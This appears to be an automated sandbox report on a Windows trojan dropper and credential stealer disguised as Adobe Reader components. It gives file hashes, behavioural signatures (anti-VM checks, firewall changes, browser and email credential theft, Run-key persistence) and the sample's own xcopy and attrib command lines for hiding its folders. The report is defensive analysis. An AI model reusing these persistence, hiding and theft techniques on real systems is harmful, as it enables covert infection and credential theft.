C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol03.bat

MD5 fd7c0388ca12d5d72cbdc97994d59d40
SHA1 655221c41dfdc27631d4b738138bb32680022aea
SHA256 8e7846031b9c738440e55b6ab1d481c17610a330d82d5467761c7e8fbf6ba38a
SHA512 d6a77f0387aeae78ff929c16f0aeea82df93e81eaafcb20e05d3c080602d1fd670a5b84da9cafb031b7a546682171c54931c388734627185019c2eed5fff20e9

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\BReader.exe

MD5 1a1075e5e307f3a4b8527110a51ce827
SHA1 f453838ed21020b7ca059244feea8579e5aa74ef
SHA256 ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512 b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\Adobeta.exe

MD5 f20a3059bc40437c8dac850095b076cc
SHA1 9b1d118b02ab9942e9fab659329b5556190b08a0
SHA256 5c75cc6d95f79d1d4a1c83b03500dbdc9d9b0b1dacdb61bbf28caf62da366c98
SHA512 d2a497929e8373fb7035601654e80ed05e73282d1a909429286e6afe18344819b3e173fc5fa4d12ef3deadb8d67000b245fb98e376e3fabc2544d0b1a693ee75

memory/1584-118-0x0000000000400000-0x000000000044C000-memory.dmp

memory/1276-117-0x00000000001C0000-0x000000000020C000-memory.dmp

memory/1276-116-0x00000000001C0000-0x000000000020C000-memory.dmp

memory/1584-119-0x0000000000400000-0x000000000044C000-memory.dmp

memory/1276-125-0x0000000002860000-0x0000000002B70000-memory.dmp

memory/1276-124-0x0000000002860000-0x0000000002B70000-memory.dmp

memory/1228-128-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-129-0x0000000002610000-0x000000000281C000-memory.dmp

memory/1228-133-0x0000000002610000-0x000000000281C000-memory.dmp

memory/1228-139-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-144-0x0000000002610000-0x000000000281C000-memory.dmp

memory/1228-143-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-142-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-141-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-138-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-147-0x0000000002610000-0x000000000281C000-memory.dmp

memory/2108-154-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-155-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1228-153-0x0000000002610000-0x000000000281C000-memory.dmp

memory/1780-163-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/1276-161-0x0000000002860000-0x0000000002B59000-memory.dmp

memory/1276-160-0x00000000001C0000-0x000000000020C000-memory.dmp

memory/1276-159-0x0000000002860000-0x0000000002B59000-memory.dmp

memory/1952-165-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/1952-166-0x0000000002730000-0x000000000293C000-memory.dmp

memory/1952-170-0x0000000002730000-0x000000000293C000-memory.dmp

C:\ProgramData\TEMP\RAIDTest

MD5 4ce4d01ccc41c2e73643c40abe61aa58
SHA1 2dcb3b58de4e71a1febd32f789d5fb36de11cadd
SHA256 09813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced
SHA512 f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef

C:\Users\Admin\AppData\Local\Temp\9F86B0A0.TMP

MD5 cd66461f69ae9b5d968c90f719972c41
SHA1 880c320a1458a68b9be8eb957f2b224d8474bd0e
SHA256 7abd65e9c543d7aa5ba69e0c6a9f125ee14766120cf4fbf48a030c2f51920878
SHA512 98a136959177500ecbd56e1791b66f330831f4d87d2c9c2fe1ec58ea55cabe35c146f2a3784b747e6d01db2228cc30d3a5d55b2c3a91c3a3bd42e0f13161a1e0

memory/1952-176-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/1952-180-0x0000000002730000-0x000000000293C000-memory.dmp

memory/1276-182-0x0000000002860000-0x0000000002B70000-memory.dmp

memory/1952-179-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/1952-178-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/1952-177-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/1952-183-0x0000000002730000-0x000000000293C000-memory.dmp

memory/1276-185-0x0000000002860000-0x0000000002B59000-memory.dmp

memory/1952-187-0x0000000002730000-0x000000000293C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\112.112

MD5 51e38a852a05cc9718fa3f68041e9dad
SHA1 dd4bee5a01be174c3fda9904c61cfb2c41ede71c
SHA256 b6e9dcb02e18ec89d3e003c56fffab57b9afb032f89f5a7826b729311938b288
SHA512 197fb341edd0185948ff9739368ab0bea74012e87c9d27a67a665af50be2df7d6305b336e16cd1cec04dcca330dbbf6103d942ca9796030eb0b67fd331bea675

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\011.011

MD5 3d82b40a04974ccbafd65be06fe92c6f
SHA1 fa50aeb633d719640c7f47ccb06700ca7a94f667
SHA256 28905ea6324ea03ffb267bcecd18fca1e045f70a7bd5e5e54f883368736ccb59
SHA512 e17b60add4ee06251f570b6bf3245cfd230f7334e4c2f609e030e9c70f24bfe87365ae7a9ac586a285b8b87f5af6e3debb8d80639143102ee2f12455b48fbd03

memory/1780-190-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/1276-200-0x00000000001C0000-0x000000000020C000-memory.dmp

memory/2496-203-0x0000000000400000-0x000000000044C000-memory.dmp

memory/1276-207-0x00000000001C0000-0x000000000020C000-memory.dmp

memory/2360-209-0x0000000000400000-0x000000000044C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-27 17:43

Reported

2024-08-27 17:45

Platform

win10v2004-20240802-en

Max time kernel

139s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

Signatures

Banload

trojan dropper downloader banload

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lodhgyuuuf = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6} C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "EAPSIM Identity Task class" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32 C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ = "%systemroot%\\SysWow64\\eapsimextdesktop.dll" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2596 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1256 wrote to memory of 1180 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1180 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1180 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1180 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1180 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1180 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 1180 wrote to memory of 3496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 1180 wrote to memory of 3496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 3496 wrote to memory of 2428 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2428 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2428 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2428 wrote to memory of 3940 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 2428 wrote to memory of 3940 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 2428 wrote to memory of 3940 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 2428 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2428 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2428 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2428 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2428 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2428 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"

